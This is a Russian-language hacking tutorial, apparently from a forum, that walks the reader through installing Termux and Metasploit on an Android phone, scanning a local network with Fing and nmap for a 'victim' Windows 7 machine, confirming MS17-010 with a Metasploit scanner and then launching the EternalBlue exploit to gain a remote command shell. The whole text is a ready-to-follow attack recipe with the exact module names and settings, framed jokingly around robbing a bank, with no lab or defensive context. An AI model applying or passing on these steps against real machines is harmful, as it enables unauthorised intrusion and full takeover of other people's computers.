Взламываем компьютер с помощью мобильного телефона.

Всё что нам для этого понадобится:


  • Прямые руки
  • Телефон на Android
  • Fing
  • nmap
  • termux и metasploit или kali nethunter

1) Для начала скачаем termux из google play

Теперь установим metasploit:


Код:

apt update

Код:

apt upgrade

Код:

apt install curl

Код:

curl -LO 

Код:

cd metasploit-framework-4.14.28

Код:

./msfconsole

Знаю, загрузка довольно долгая,но нужно потерпеть, сожми яйца в кулак и жди.


После всего у нас открывается metasploit



После того, как вы установили metasploit, можете считать, что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.


2) Сканирование сети c Fing.

Теперь посмотрим кто есть в нашей сети:

Для этого удобно использовать утилиту Fing

Вот так выглядит моя локальная сеть (у всех по разному):



И если у вас зрение не минус 40, то можно легко увидеть "USER-ПК" (у всех всё по разному) он и будет нашей жертвой. Выбираем и запоминаем ip нашей жертвы, в моём случае это 192.168.1.104 и сканируем его на порты.


3) Сканирование на открытые порты c nmap.

Установим этот чудесный инструмент:

Код:

apt-get update

Код:

apt-get install nmap

ip нашей жертвы,в моём случае это 192.168.1.104, сканируем его на порты

Код:

nmap ip жертвы

В моём случае это:

nmap 192.168.1.104

Есть бесконечное множество настроек nmap, но в данный момент подойдёт именно эта (из за скорости)

Вот что мы видим:



У меня установлен Windows 7, и у неё открыт 445 порт, любому более менее понимающему человеку в metasploit , сразу понятно, что первым делом мы будем использовать эксплоит eternalblue.


4) Проверка уязвимости

Дальше пойдут скрины с консоли kali nethunter, так что не пугайтесь,все команды идентичны с командами в termux. (Мне так просто реально удобнее)

Для начала мы протестим на сканере, возьмёт ли наш эксплоит нашу жертву.

в metasploit вводите:

Код:

use auxiliary/scanner/smb/smb_ms17_010

Здесь нам нужно указать только ip адрес жертвы

Код:

Выглядит это так:

set RHOSTS ip жертвы

В моём случае это:

set RHOSTS 192.168.1.104

Запускаем **** командой

Код:

run



Если мы видим что-то подобное , значит хост уязвим к эксплоиту


5) Теперь завершающая стадия: использование эксплоита

В том же metasploit пишем

Код:

use exploit/windows/smb/ms17_010_eternalblue

Здесь нам нужно указать ip жертвы и процесс

Ip жертвы:

Код:

Выглядит это так:

set RHOST ip жертвы

В моём случае это:

set RHOST 192.168.1.104

И процесс

Код:

set ProcessName explorer.exe



И после того, как вы помолились и поставили икону на обои можно запускать эксплоит.

Код:

exploit

Если всё удачно, то тогда мы получим полный доступ к командной строке атакуемого компьютера.



Всем спасибо за внимание!